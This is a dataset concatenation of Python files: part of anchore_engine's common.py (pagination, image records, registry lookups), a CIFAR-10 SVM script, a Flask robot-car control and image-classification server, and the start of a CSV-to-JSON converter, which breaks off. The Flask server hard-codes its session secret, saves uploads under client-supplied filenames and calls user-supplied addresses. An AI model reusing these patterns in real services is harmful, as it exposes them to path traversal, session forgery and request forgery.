int(limit)\n if dosort:\n #input_items.sort()\n #input_items.sort(key=lambda x: x['image']['imageDigest'])\n input_items.sort(key=sortfunc)\n\n start = (page-1)*limit\n end = start + limit\n paginated_items = input_items[start:end]\n\n if len(paginated_items) == limit and (paginated_items[-1] != input_items[-1]):\n next_page = page + 1\n\n return(page, next_page, paginated_items)\n\npagination_cache = {}\ndef get_cached_pagination(query_digest=\"\"):\n current_time = time.time()\n\n if query_digest not in pagination_cache:\n raise Exception(\"document not in pagination cache.\")\n elif pagination_cache.get(query_digest, {}).get('ttl', 0.0) < current_time:\n logger.debug(\"expiring query cache content: {}\".format(query_digest))\n el = pagination_cache.pop(query_digest, None)\n del(el)\n raise Exception(\"document is expired in pagination cache.\")\n\n return(pagination_cache[query_digest]['content'])\n\ndef do_cached_pagination(input_items, page=None, limit=None, dosort=True, sortfunc=lambda x: x, query_digest=\"\", ttl=0.0):\n current_time = time.time()\n\n if ttl <= 0.0:\n 
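A hedged sanity check of do_simple_pagination from the record above; the item list and page size are illustrative:

items = [{"id": i} for i in range(7)]
page, next_page, chunk = do_simple_pagination(
    items, page=2, limit=3, sortfunc=lambda x: x["id"])
# chunk == items[3:6]; next_page == 3 because a third page remains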
logger.debug(\"skipping cache as ttl is <= 0.0 ({})\".format(ttl))\n elif query_digest not in pagination_cache:\n logger.debug(\"caching query content\")\n pagination_cache[query_digest] = {\n 'ttl': current_time + float(ttl),\n 'content': list(input_items),\n }\n return(do_simple_pagination(input_items, page=page, limit=limit, dosort=dosort, sortfunc=sortfunc, query_digest=query_digest, ttl=ttl))\n\ndef make_response_paginated_envelope(input_items, envelope_key='result', page=\"1\", limit=None, dosort=True, sortfunc=lambda x: x, pagination_func=do_simple_pagination, query_digest=\"\", ttl=0.0):\n page, next_page, paginated_items = pagination_func(input_items, page=page, limit=limit, dosort=dosort, sortfunc=sortfunc, query_digest=query_digest, ttl=ttl)\n return_object = {\n envelope_key: paginated_items,\n 'page': \"{}\".format(page),\n 'returned_count': len(paginated_items),\n 'total_count': len(input_items),\n }\n if next_page:\n return_object['next_page'] = \"{}\".format(next_page)\n\n return(return_object)\n\ndef update_image_record_with_analysis_data(image_record, image_data):\n\n image_summary_data = extract_analyzer_content(image_data, 'metadata')\n\n try:\n image_summary_metadata = copy.deepcopy(image_summary_data)\n if image_summary_metadata:\n logger.debug(\"getting image summary data\")\n\n summary_record = {}\n\n adm = image_summary_metadata['anchore_distro_meta']\n\n summary_record['distro'] = adm.pop('DISTRO', 'N/A')\n summary_record['distro_version'] = adm.pop('DISTROVERS', 'N/A')\n\n air = image_summary_metadata['anchore_image_report']\n airm = air.pop('meta', {})\n al = air.pop('layers', [])\n ddata = air.pop('docker_data', {})\n\n summary_record['layer_count'] = str(len(al))\n summary_record['dockerfile_mode'] = air.pop('dockerfile_mode', 'N/A') \n summary_record['arch'] = ddata.pop('Architecture', 'N/A') \n summary_record['image_size'] = str(int(airm.pop('sizebytes', 0))) \n\n formatted_image_summary_data = summary_record \n except Exception as err:\n formatted_image_summary_data = {}\n\n if formatted_image_summary_data:\n image_record.update(formatted_image_summary_data)\n \n dockerfile_content, dockerfile_mode = extract_dockerfile_content(image_data)\n if dockerfile_content and dockerfile_mode:\n image_record['dockerfile_mode'] = dockerfile_mode\n for image_detail in image_record['image_detail']:\n logger.debug(\"setting image_detail: \")\n image_detail['dockerfile'] = str(base64.b64encode(dockerfile_content.encode('utf-8')), 'utf-8')\n\n return(True)\n\nif False:\n def format_image_summary(image_summary_data):\n ret = {}\n\n # augment with image summary data, if available\n try:\n #if not input_image_summary_data:\n # try:\n # image_summary_data = catalog.get_document(user_auth, 'image_summary_data', image_record['imageDigest'])\n # except:\n # image_summary_data = {}\n #else:\n # image_summary_data = input_image_summary_data\n\n #if not image_summary_data:\n # # (re)generate image_content_data document\n # logger.debug(\"generating image summary data from analysis data\")\n # image_data = catalog.get_document(user_auth, 'analysis_data', image_record['imageDigest'])\n\n # image_content_data = {}\n # for content_type in anchore_engine.services.common.image_content_types:\n # try:\n # image_content_data[content_type] = anchore_engine.services.common.extract_analyzer_content(image_data, content_type)\n # except:\n # image_content_data[content_type] = {}\n # if image_content_data:\n # logger.debug(\"adding image content data to archive\")\n # rc = 
catalog.put_document(user_auth, 'image_content_data', image_record['imageDigest'], image_content_data)\n\n # image_summary_data = {}\n # try:\n # image_summary_data = anchore_engine.services.common.extract_analyzer_content(image_data, 'metadata')\n # except:\n # image_summary_data = {}\n\n # #if image_summary_data:\n # # logger.debug(\"adding image summary data to archive\")\n # # rc = catalog.put_document(user_auth, 'image_summary_data', image_record['imageDigest'], image_summary_data)\n\n image_summary_metadata = copy.deepcopy(image_summary_data)\n if image_summary_metadata:\n logger.debug(\"getting image summary data\")\n\n summary_record = {}\n\n adm = image_summary_metadata['anchore_distro_meta']\n\n summary_record['distro'] = adm.pop('DISTRO', 'N/A')\n summary_record['distro_version'] = adm.pop('DISTROVERS', 'N/A')\n\n air = image_summary_metadata['anchore_image_report']\n airm = air.pop('meta', {})\n al = air.pop('layers', [])\n ddata = air.pop('docker_data', {})\n\n summary_record['layer_count'] = str(len(al))\n summary_record['dockerfile_mode'] = air.pop('dockerfile_mode', 'N/A') \n summary_record['arch'] = ddata.pop('Architecture', 'N/A') \n summary_record['image_size'] = str(int(airm.pop('sizebytes', 0))) \n\n ret = summary_record\n\n except Exception as err:\n logger.warn(\"cannot format image summary data for image - exception: \" + str(err))\n\n return(ret)\n\n\ndef make_response_error(errmsg, in_httpcode=None, **kwargs):\n if not in_httpcode:\n httpcode = 500\n else:\n httpcode = in_httpcode\n detail = {}\n msg = str(errmsg)\n\n ret = {\n 'message': msg,\n 'httpcode': int(httpcode),\n 'detail': kwargs.get('detail', {})\n }\n\n if type(errmsg) == Exception:\n if 'anchore_error_json' in errmsg.__dict__:\n if set(['message', 'httpcode', 'detail']).issubset(set(errmsg.__dict__['anchore_error_json'])):\n ret.update(errmsg.__dict__['anchore_error_json'])\n \n return(ret)\n\ndef make_anchore_exception(err, input_message=None, input_httpcode=None, input_detail=None, override_existing=False):\n ret = Exception(err)\n\n if not input_message:\n message = str(err)\n else:\n message = input_message\n\n if input_detail != None:\n detail = input_detail\n else:\n detail = {'raw_exception_message': str(err)}\n\n if not input_httpcode:\n httpcode = 500\n else:\n httpcode = input_httpcode\n\n anchore_error_json = {}\n try:\n if type(err) == Exception:\n if 'anchore_error_json' in err.__dict__:\n anchore_error_json.update(err.__dict__['anchore_error_json'])\n except:\n pass\n\n if override_existing or not anchore_error_json:\n ret.anchore_error_json = {\n 'message': message,\n 'detail': detail,\n 'httpcode': httpcode,\n }\n else:\n ret.anchore_error_json = anchore_error_json\n\n return(ret)\n\ndef make_response_routes(apiversion, inroutes):\n return_object = {}\n httpcode = 500\n\n routes = []\n try:\n for route in inroutes:\n routes.append('/'.join([apiversion, route]))\n except Exception as err:\n httpcode = 500\n return_object = make_response_error(err, in_httpcode=httpcode)\n httpcode = return_object['httpcode']\n\n else:\n httpcode = 200\n return_object = routes\n\n return(return_object, httpcode)\n\ndef lookup_registry_image(userId, image_info, registry_creds):\n digest = None\n manifest = None\n\n if not anchore_resources.registry_access(userId, image_info['registry']):\n raise Exception(\"access denied for user (\"+str(userId)+\") registry (\"+str(image_info['registry'])+\")\")\n else:\n try:\n manifest,digest = docker_registry.get_image_manifest(userId, image_info, registry_creds)\n 
#if 'schemaVersion' not in manifest or manifest['schemaVersion'] != 2:\n # raise Exception(\"manifest schemaVersion != 2 not supported\")\n except Exception as err:\n raise anchore_engine.services.common.make_anchore_exception(err, input_message=\"cannot fetch image digest/manifest from registry\", input_httpcode=400)\n #raise Exception(\"cannot fetch image digest/manifest from registry - exception: \" + str(err))\n\n return(digest, manifest)\n\ndef get_image_info(userId, image_type, input_string, registry_lookup=False, registry_creds=[]):\n ret = {}\n if image_type == 'docker':\n try:\n image_info = anchore_engine.utils.parse_dockerimage_string(input_string)\n except Exception as err:\n raise anchore_engine.services.common.make_anchore_exception(err, input_message=\"cannot handle image input string\", input_httpcode=400)\n\n ret.update(image_info)\n\n if registry_lookup and image_info['registry'] != 'localbuild':\n digest, manifest = lookup_registry_image(userId, image_info, registry_creds)\n image_info['digest'] = digest\n image_info['fulldigest'] = image_info['registry']+\"/\"+image_info['repo']+\"@\"+digest\n image_info['manifest'] = manifest\n \n # if we got a manifest, and the image_info does not yet contain an imageId, try to get it from the manifest\n if manifest and not image_info['imageId']:\n try:\n imageId = re.sub(\"^sha256:\", \"\", manifest['config']['digest'])\n image_info['imageId'] = imageId\n except Exception as err:\n logger.debug(\"could not extract imageId from fetched manifest - exception: \" + str(err))\n logger.debug(\"using digest hash as imageId due to incomplete manifest (\"+str(image_info['fulldigest'])+\")\")\n htype, image_info['imageId'] = image_info['digest'].split(\":\", 1)\n\n ret.update(image_info)\n else:\n image_info['manifest'] = {}\n\n else:\n raise Exception (\"image type (\"+str(image_type)+\") not supported\")\n\n return(ret)\n\ndef policy_engine_image_load(client, imageUserId, imageId, imageDigest):\n\n resp = None\n\n try:\n request = ImageIngressRequest(user_id=imageUserId, image_id=imageId, fetch_url='catalog://'+str(imageUserId)+'/analysis_data/'+str(imageDigest))\n\n #request = ImageIngressRequest()\n #request.user_id = imageUserId\n #request.image_id = imageId\n #request.fetch_url='catalog://'+str(imageUserId)+'/analysis_data/'+str(imageDigest)\n\n logger.debug(\"policy engine request (image add): \" + str(request))\n resp = client.ingress_image(request)\n logger.spew(\"policy engine response (image add): \" + str(resp))\n except Exception as err:\n logger.error(\"failed to add/check image: \" + str(err))\n raise err\n\n return(resp)\n\ndef clean_docker_image_details_for_update(image_details):\n ret = []\n\n for image_detail in image_details:\n el = {}\n for k in list(image_detail.keys()):\n if image_detail[k] != None:\n el[k] = image_detail[k]\n ret.append(el)\n return(ret)\n\ndef make_image_record(userId, image_type, input_string, image_metadata={}, registry_lookup=True, registry_creds=[]):\n if image_type == 'docker':\n try:\n dockerfile = image_metadata['dockerfile']\n except:\n dockerfile = None\n\n try:\n dockerfile_mode = image_metadata['dockerfile_mode']\n except:\n dockerfile_mode = None\n\n try:\n tag = image_metadata['tag']\n except:\n tag = None\n\n try:\n imageId = image_metadata['imageId']\n except:\n imageId = None\n\n try:\n digest = image_metadata['digest']\n except:\n digest = None\n\n try:\n annotations = image_metadata['annotations']\n except:\n annotations = {}\n\n #try:\n # manifest = image_metadata['manifest']\n 
#except:\n # manifest = None\n\n return(make_docker_image(userId, input_string=input_string, tag=tag, digest=digest, imageId=imageId, dockerfile=dockerfile, dockerfile_mode=dockerfile_mode, registry_lookup=registry_lookup, registry_creds=registry_creds, annotations=annotations))\n\n else:\n raise Exception(\"image type (\"+str(image_type)+\") not supported\")\n\n return(None)\n\ndef make_docker_image(userId, input_string=None, tag=None, digest=None, imageId=None, dockerfile=None, dockerfile_mode=None, registry_lookup=True, registry_creds=[], annotations={}):\n ret = {}\n\n if input_string:\n image_info = get_image_info(userId, \"docker\", input_string, registry_lookup=registry_lookup, registry_creds=registry_creds)\n else:\n if digest:\n image_info = get_image_info(userId, \"docker\", digest, registry_lookup=registry_lookup, registry_creds=registry_creds)\n digest = image_info['digest']\n \n if tag:\n image_info = get_image_info(userId, \"docker\", tag, registry_lookup=registry_lookup, registry_creds=registry_creds)\n if digest and not image_info['digest']:\n image_info['digest'] = digest\n \n if 'digest' in image_info:\n imageDigest = str(image_info['digest'])\n else:\n raise Exception(\"input image_info needs to have a digest\")\n \n if imageId:\n image_info['imageId'] = imageId\n\n new_input = db.CatalogImage().make()\n new_input['imageDigest'] = imageDigest\n new_input['userId'] = userId\n new_input['image_type'] = 'docker'\n new_input['dockerfile_mode'] = dockerfile_mode\n\n final_annotation_data = {}\n for k,v in list(annotations.items()):\n if v != 'null':\n final_annotation_data[k] = v\n new_input['annotations'] = json.dumps(final_annotation_data)\n \n new_image_obj = db.CatalogImage(**new_input)\n new_image = dict((key,value) for key, value in vars(new_image_obj).items() if not key.startswith('_'))\n new_image['image_detail'] = []\n\n if image_info['tag']:\n new_input = db.CatalogImageDocker().make()\n new_input['imageDigest'] = imageDigest\n new_input['userId'] = userId\n new_input['dockerfile'] = dockerfile\n\n for t in ['registry', 'repo', 'tag', 'digest', 'imageId']:\n if t in image_info:\n new_input[t] = image_info[t]\n \n new_docker_image_obj = db.CatalogImageDocker(**new_input)\n new_docker_image = dict((key,value) for key, value in vars(new_docker_image_obj).items() if not key.startswith('_'))\n new_image['image_detail'] = [new_docker_image]\n\n ret = new_image\n return(ret)\n\ndef make_policy_record(userId, bundle, policy_source=\"local\", active=False):\n payload = {}\n\n policyId = bundle['id']\n\n payload[\"policyId\"] = policyId\n payload[\"active\"] = active\n payload[\"userId\"] = userId\n payload['policybundle'] = bundle\n payload['policy_source'] = policy_source\n\n return(payload)\n\ndef make_eval_record(userId, evalId, policyId, imageDigest, tag, final_action, eval_url):\n payload = {}\n\n payload[\"policyId\"] = policyId\n payload[\"userId\"] = userId\n payload[\"evalId\"] = evalId\n payload[\"imageDigest\"] = imageDigest\n payload[\"tag\"] = tag\n payload[\"final_action\"] = final_action\n payload[\"policyeval\"] = eval_url\n payload[\"created_at\"] = int(time.time())\n payload[\"last_updated\"] = payload['created_at']\n\n return(payload)\n\ndef do_request_prep(request, default_params={}):\n ret = {}\n try:\n try:\n ret['auth'] = (request.authorization.username, request.authorization.password)\n except:\n try:\n ret['auth'] = (request.authorization.username, None)\n except:\n ret['auth'] = (None, None)\n\n try:\n ret['userId'] = 
request.authorization.username\n except:\n ret['userId'] = None\n\n ret['method'] = request.method\n ret['bodycontent'] = str(request.get_data(), 'utf-8') if request.get_data() is not None else None\n ret['params'] = default_params\n for param in list(request.args.keys()):\n if type(request.args[param]) in [str, str]:\n if request.args[param].lower() == 'true':\n val = True\n elif request.args[param].lower() == 'false':\n val = False\n else:\n val = request.args[param]\n else:\n val = request.args[param]\n\n ret['params'][param] = val\n\n query_signature = copy.deepcopy(ret)\n query_signature['path'] = request.path\n query_signature.get('params', {}).pop('page', None)\n query_signature.get('params', {}).pop('limit', None)\n ret['pagination_query_digest'] = hashlib.sha256(json.dumps(query_signature, sort_keys=True).encode('utf8')).hexdigest()\n\n except Exception as err:\n logger.error(\"error processing request parameters - exception: \" + str(err))\n raise err\n\n return(ret)\n\ndef extract_dockerfile_content(image_data):\n dockerfile_content = \"\"\n dockerfile_mode = \"Guessed\"\n\n try:\n dockerfile_content = image_data[0]['image']['imagedata']['image_report']['dockerfile_contents']\n dockerfile_mode = image_data[0]['image']['imagedata']['image_report']['dockerfile_mode']\n except Exception as err:\n dockerfile_content = \"\"\n dockerfile_mode = \"Guessed\"\n\n return(dockerfile_content, dockerfile_mode)\n\ndef extract_analyzer_content(image_data, content_type, manifest=None):\n ret = {}\n try:\n idata = image_data[0]['image']\n imageId = idata['imageId']\n \n if content_type == 'files':\n try:\n fcsums = {}\n if 'files.sha256sums' in idata['imagedata']['analysis_report']['file_checksums']:\n adata = idata['imagedata']['analysis_report']['file_checksums']['files.sha256sums']['base']\n for k in list(adata.keys()):\n fcsums[k] = adata[k]\n\n if 'files.allinfo' in idata['imagedata']['analysis_report']['file_list']:\n adata = idata['imagedata']['analysis_report']['file_list']['files.allinfo']['base']\n for k in list(adata.keys()):\n avalue = json.loads(adata[k])\n if k in fcsums:\n avalue['sha256'] = fcsums[k]\n ret[k] = avalue\n \n except Exception as err:\n raise Exception(\"could not extract/parse content info - exception: \" + str(err))\n elif content_type == 'os':\n try:\n if 'pkgs.allinfo' in idata['imagedata']['analysis_report']['package_list']:\n adata = idata['imagedata']['analysis_report']['package_list']['pkgs.allinfo']['base']\n for k in list(adata.keys()):\n avalue = json.loads(adata[k])\n ret[k] = avalue\n except Exception as err:\n raise Exception(\"could not extract/parse content info - exception: \" + str(err))\n elif content_type == 'npm':\n try:\n if 'pkgs.npms' in idata['imagedata']['analysis_report']['package_list']:\n adata = idata['imagedata']['analysis_report']['package_list']['pkgs.npms']['base']\n for k in list(adata.keys()):\n avalue = json.loads(adata[k])\n ret[k] = avalue\n except Exception as err:\n raise Exception(\"could not extract/parse content info - exception: \" + str(err))\n elif content_type == 'gem':\n try:\n if 'pkgs.gems' in idata['imagedata']['analysis_report']['package_list']:\n adata = idata['imagedata']['analysis_report']['package_list']['pkgs.gems']['base']\n for k in list(adata.keys()):\n avalue = json.loads(adata[k])\n ret[k] = avalue\n except Exception as err:\n raise Exception(\"could not extract/parse content info - exception: \" + str(err))\n elif content_type == 'python':\n try:\n if 'pkgs.python' in 
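A hedged sketch of the cache-key idea in do_request_prep above: the digest is taken over the request signature with page/limit popped out, so every page of the same logical query maps to one pagination-cache entry. The example signature is invented:

import hashlib, json

sig = {"path": "/images", "params": {"fulltag": "nginx:latest"}}
key = hashlib.sha256(json.dumps(sig, sort_keys=True).encode("utf8")).hexdigest()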
idata['imagedata']['analysis_report']['package_list']:\n adata = idata['imagedata']['analysis_report']['package_list']['pkgs.python']['base']\n for k in list(adata.keys()):\n avalue = json.loads(adata[k])\n ret[k] = avalue\n except Exception as err:\n raise Exception(\"could not extract/parse content info - exception: \" + str(err))\n elif content_type == 'java':\n try:\n if 'pkgs.java' in idata['imagedata']['analysis_report']['package_list']:\n adata = idata['imagedata']['analysis_report']['package_list']['pkgs.java']['base']\n for k in list(adata.keys()):\n avalue = json.loads(adata[k])\n ret[k] = avalue\n except Exception as err:\n raise Exception(\"could not extract/parse content info - exception: \" + str(err))\n elif content_type == 'metadata':\n try:\n if 'image_report' in idata['imagedata'] and 'analyzer_meta' in idata['imagedata']['analysis_report']:\n ret = {'anchore_image_report': image_data[0]['image']['imagedata']['image_report'], 'anchore_distro_meta': image_data[0]['image']['imagedata']['analysis_report']['analyzer_meta']['analyzer_meta']['base']}\n except Exception as err:\n raise Exception(\"could not extract/parse content info - exception: \" + str(err))\n elif content_type == 'manifest':\n ret = {}\n try:\n if manifest:\n ret = json.loads(manifest)\n except:\n ret = {}\n elif content_type == 'docker_history':\n ret = []\n try:\n ret = idata.get('imagedata', {}).get('image_report', {}).get('docker_history', [])\n except:\n ret = []\n elif content_type == 'dockerfile':\n ret = \"\"\n try:\n if idata.get('imagedata', {}).get('image_report', {}).get('dockerfile_mode', \"\").lower() == 'actual':\n ret = idata.get('imagedata', {}).get('image_report', {}).get('dockerfile_contents', \"\")\n except:\n ret = \"\"\n\n except Exception as err:\n logger.warn(\"exception: \" + str(err))\n raise err\n\n return(ret)\n\n\ndef get_system_user_auth(session=None):\n localconfig = anchore_engine.configuration.localconfig.get_config()\n if 'system_user_auth' in localconfig and localconfig['system_user_auth'] != (None, None):\n return(localconfig['system_user_auth'])\n\n if session:\n system_user = db_users.get('anchore-system', session=session)\n if system_user:\n return( (system_user['userId'], system_user['password']) )\n\n return ( (None, None) )\n","sub_path":"anchore_engine/services/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":26223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"418472665","text":"from sklearn import svm,metrics\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix\n\ndef unpickle(filename):\n import pickle\n with open(filename, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n return dict\n\nNUM_BATCH = 1\n\nif __name__ == \"__main__\":\n train_data = []\n test_data = unpickle(\"cifar-10-batches-py/test_batch\")\n for i in range(NUM_BATCH):\n filename = \"cifar-10-batches-py/data_batch_\"+str(i+1)\n train_data.append(unpickle(filename))\n\n train_i = train_data[0][b'data']\n train_l = train_data[0][b'labels']\n test_i = test_data[b'data']\n test_l = test_data[b'labels']\n\n # train_i = train_i.reshape(10000, 3, 32, 32)\n # train_i = train_i.transpose([0, 2, 3, 1])\n\n # train_l = np.array(train_l)\n # train_l = np.identity(10)[train_l]\n\n train_i = train_i[:5000]/256\n train_l = np.array(train_l[:5000])\n test_i = test_i[:1000]/256\n test_l = np.array(test_l[:1000])\n\n clf = svm.SVC()\n clf.fit(train_i, train_l)\n pre = clf.predict(test_i)\n 
print(\"---accuracy---\")\n print(metrics.accuracy_score(test_l, pre))\n print(\"Confusion matrix\")\n print(metrics.confusion_matrix(test_l, pre,labels=[0,1,2,3,4,5,6,7,8,9]))\n","sub_path":"cifar_svm.py","file_name":"cifar_svm.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"640844397","text":"import os\nimport path_helper_main_ml\nfrom classifier import initialize_classifier, classify_image\nfrom flask import Flask, render_template, url_for, redirect, request, session\nimport requests\n\ngraph, label = initialize_classifier()\nREMOTE_API_PORT = \"5000\"\nHOST_PORT = \"8000\"\n\napp = Flask(__name__)\napp.secret_key = 'SUPER SECRET KEY'\n\n# USER ROUTES\n@app.route('/')\ndef welcome_page():\n return render_template('index.html')\n\n@app.route('/set_ip_address')\ndef set_ip_address():\n session['ip'] = 'http://' + request.args['ip'] + ':' + REMOTE_API_PORT\n session['host_ip'] = 'http://' + request.args['host_ip'] + ':' + HOST_PORT\n return redirect('/rc')\n\n@app.route('/given_ip')\ndef select_mode_page():\n return render_template('given_ip.html')\n\n@app.route('/rc')\ndef user_driven():\n html_return = requests.get(session['ip']).text\n image_url = session['ip'] + html_return.split(\"img src=\")[1].split('><')[0]\n return render_template('rc.html',image_url=image_url)\n\n@app.route('/route_left')\ndef get_move_left():\n left_command = requests.get(session['ip'] + '/piv_left')\n print(left_command)\n return redirect('/rc')\n\n@app.route('/route_forward')\ndef get_move_forward():\n forward_command = requests.get(session['ip'] + '/forward')\n return redirect('/rc')\n\n@app.route('/route_right')\ndef get_move_right():\n right_command = requests.get(session['ip'] + '/piv_right')\n return redirect('/rc')\n\n# API ROUTES\n@app.route('/upload', methods=['POST'])\ndef upload_file():\n file = request.files['image']\n savepath = os.path.join(\"./current_image\", file.filename)\n file.save(savepath)\n move = classify_image(savepath, graph, label)[0][0]\n os.remove(savepath)\n return move\n\n@app.route('/ai_move')\ndef ai_move():\n requests.get(session['ip'] + '/ai_move?host_url=' + session['host_ip'] + '/upload')\n return redirect('/rc')\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8000)\n","sub_path":"snailMLserver.py","file_name":"snailMLserver.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"571291674","text":"#!/usr/bin/env python\r\n#-*- coding: utf-8 -*-\r\n\r\n'''\r\n Author : Jaekyu Lee, github : https://github.com/JaekyuLee\r\n https://github.com/ChulseoungChae\r\n https://github.com/KimHyeongGoo\r\n https://github.com/jeonghoonkang\r\n'''\r\n\r\nfrom __future__ import print_function\r\n#import requests\r\nimport time\r\nimport json\r\nfrom collections import OrderedDict\r\nimport pandas as pd\r\nimport sys\r\nimport os\r\nimport argparse\r\nimport shutil\r\nimport copy\r\nfrom datetime import datetime\r\n\r\nimport pcs\r\n#출력 디렉토리 이름을 output으로 변경\r\n# Result, changed JSON 등 , output 디렉토리 하부에 저장\r\n# write 관련 함수는 모듈을 따로 파일로 만들면 좋을것같음\r\n\r\nARG= 50 #argment\r\n\r\ndef dprint(s): # debug_print\r\n global g_DEBUG\r\n if (g_DEBUG):\r\n print (' ', s)\r\n else : return None\r\n\r\ndef brush_argparse():\r\n\r\n global g_DEBUG # dprint 함수 실행을 위한 플래그\r\n\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-debug\", help=\"debug mode run\", action=\"store_true\")\r\n 
parser.add_argument(\"-jsonpack\", help=\"how many json's in one output file\", type=int)\r\n parser.add_argument(\"-filetype\", help=\"csv or xlsx\")\r\n parser.add_argument(\"-filekind\", help=\"select file type number you'll store\")\r\n parser.add_argument(\"-field\", help=\"select field idx you'll store\")\r\n parser.add_argument(\"-ts\", help=\"select timestamp field idx you'll store\")\r\n parser.add_argument(\"-carid\", help=\"select carid field idx you'll store\")\r\n parser.add_argument(\"-metric\", help=\"select metric you'll store\")\r\n parser.add_argument(\"-outdir\", help=\"select outdir\", type=str, default='./output')\r\n parser.add_argument(\"-pn\", help=\"select producer num\", default='4')\r\n parser.add_argument(\"-cn\", help=\"select consumer num\", default='2')\r\n \r\n args = parser.parse_args()\r\n \r\n if (args.debug) : \r\n g_DEBUG = True\r\n dprint ('DPRINT Enabled ************************************** ' + __file__ )\r\n \r\n return args\r\n\r\ndef make_result_dirctory_tree(_savepath, filepath, _carid):\r\n _savepath = _savepath+\"/resultData\"\r\n if not(os.path.isdir(_savepath)):\r\n os.makedirs(os.path.join(_savepath))\r\n filepath = filepath.split('originalCSVData')[-1]\r\n if filepath[0] == '/':\r\n filepath = filepath[1:]\r\n filepath = filepath.split('/')[0:-1]\r\n for sub in filepath:\r\n _savepath = _savepath + '/' + sub\r\n if not(os.path.isdir(_savepath)):\r\n os.makedirs(os.path.join(_savepath))\r\n if _savepath[-1] == '/':\r\n _savepath = _savepath[0:-1]\r\n _savepath = _savepath + '/' + _carid\r\n if not(os.path.isdir(_savepath)):\r\n os.makedirs(os.path.join(_savepath))\r\n return _savepath \r\n \r\n# make a file\r\ndef writeJson(_buffer, _json_title):\r\n with open(_json_title+'.json', 'a') as f:\r\n json.dump(_buffer, f, ensure_ascii=False, indent=4)\r\n\r\n# create folder & make files\r\ndef writeJsonfiles(_buffer, _json_title, _num, _fname, _carid, _outdir):\r\n #try:\r\n savepath = os.path.dirname(os.path.realpath(__file__))\r\n savepath = savepath + _outdir[1:] \r\n _indx = savepath.find('//')\r\n if _indx != -1:\r\n savepath = savepath[:_indx+1] + savepath[_indx+2:] \r\n if not(os.path.isdir(savepath)):\r\n os.makedirs(os.path.join(savepath))\r\n #print ('-->',savepath)\r\n savepath = make_result_dirctory_tree(savepath, _fname, _carid)\r\n # Unicode decode error가 발생하여 수정해줌\r\n with open(str(savepath + '/' +_json_title+'_'+str(_num)+'.json'), 'w') as f:\r\n try:\r\n json.dump(_buffer, f, ensure_ascii=False, indent=4)\r\n # 몇몇 파일에서 ascii관련 DecodeError 발생\r\n except:\r\n json.dump(_buffer, f, ensure_ascii=True, indent=4)\r\n print ('[' + _json_title + '_'+str(_num)+'.json] saved')\r\n \r\n\r\n# convert Time to Epoch\r\ndef convertTimeToEpoch(_time):\r\n date_time = \"%s.%s.%s %s:%s:%s\" %(_time[8:10], _time[5:7], _time[:4], _time[11:13], _time[14:16], _time[17:])\r\n pattern = \"%d.%m.%Y %H:%M:%S\"\r\n epoch = int (time.mktime(time.strptime(date_time, pattern)))\r\n return epoch\r\n\r\n# YYYYmmddHHMMSS -> dd.mm.YY HH:MM:SS\r\ndef convertTimeToEpoch_v2(_time):\r\n date_time = \"%s.%s.%s %s:%s:%s\" %(_time[6:8], _time[4:6], _time[:4], _time[8:10], _time[10:12], _time[12:])\r\n pattern = \"%d.%m.%Y %H:%M:%S\"\r\n epoch = int (time.mktime(time.strptime(date_time, pattern)))\r\n return epoch\r\n\r\n# display progress bar\r\ndef printProgressBar(iteration, total, prefix = u'처리중', suffix = u'완료',\\\r\n decimals = 1, length = 60, fill = '█'): \r\n # 작업의 진행상황을 표시\r\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / 
float(total)))\r\n    filledLength = int(length * iteration // total)\r\n    bar = fill * filledLength + '-' * (length - filledLength)\r\n    print('\\r%s |%s| %s%% %s' %(prefix, bar, percent, suffix), end='\\r')\r\n    sys.stdout.flush()\r\n    if iteration == total:\r\n        None\r\n        #print()\r\n\r\n# Build _dataInfo, which summarizes the data before it is saved to a file\r\ndef initDataInfo(_dataInfo, __list):\r\n    _dataInfo[\"1.metric\"]= __list[0][\"metric\"]\r\n    vallist = [d[\"value\"] for d in __list]\r\n    tslist = [int(d[\"timestamp\"]) for d in __list]\r\n    _dataInfo[\"2.mints\"]=min(tslist)\r\n    _dataInfo[\"3.maxts\"]=max(tslist)\r\n    _dataInfo[\"4.mindt\"]=str(datetime.fromtimestamp(_dataInfo[\"2.mints\"]))\r\n    _dataInfo[\"5.maxdt\"]=str(datetime.fromtimestamp(_dataInfo[\"3.maxts\"]))\r\n    _dataInfo[\"6.totalCnt\"]=len(__list)\r\n    _dataInfo[\"7.minval\"]=min(vallist)\r\n    _dataInfo[\"8.maxval\"]=max(vallist)\r\n    _dataInfo[\"9.tags\"]=__list[0][\"tags\"]\r\n    \r\n\r\ndef ToJsonFormat(_list, _args_pack_, _json_title, _filename):\r\n    \r\n    _list = _list.sort_values(by=[_args_pack_.ts.decode('utf-8')], axis=0)\r\n\r\n    Car_id = str(_list[_args_pack_.carid.decode('utf-8')].iloc[0]) \r\n    dftime = _list[_args_pack_.ts.decode('utf-8')].tolist()\r\n    dfval = _list[_args_pack_.field.decode('utf-8')].tolist()\r\n    \r\n    data_len = len(_list)\r\n    _buffer = []\r\n    count=0\r\n    perCount=0\r\n    num=0 #\r\n    \r\n    for i in range(len(dftime)):\r\n        perCount += 1\r\n        \r\n        value = dfval[i]\r\n        \r\n        # skip NaN value & ts\r\n        if value == 'nan' or dftime[i] == 'nan':\r\n            continue\r\n        elif value == 'NaN' or dftime[i] == 'NaN':\r\n            continue\r\n        \r\n        ts = convertTimeToEpoch(dftime[i])\r\n        ts = str(ts)\r\n        \r\n        csv_data = dict()\r\n        csv_data['metric'] = _args_pack_.metric\r\n        csv_data[\"tags\"] = dict()\r\n\r\n        csv_data['timestamp'] = ts\r\n        csv_data[\"value\"] = value\r\n        \r\n        csv_data[\"tags\"]['VEHICLE_NUM'] = str(Car_id)\r\n        csv_data[\"tags\"][\"fieldname\"] = _args_pack_.field\r\n\r\n        count += 1\r\n        _buffer.append(csv_data)\r\n        \r\n        if count >= _args_pack_.jsonpack:\r\n            dataInfo={}\r\n            initDataInfo(dataInfo, 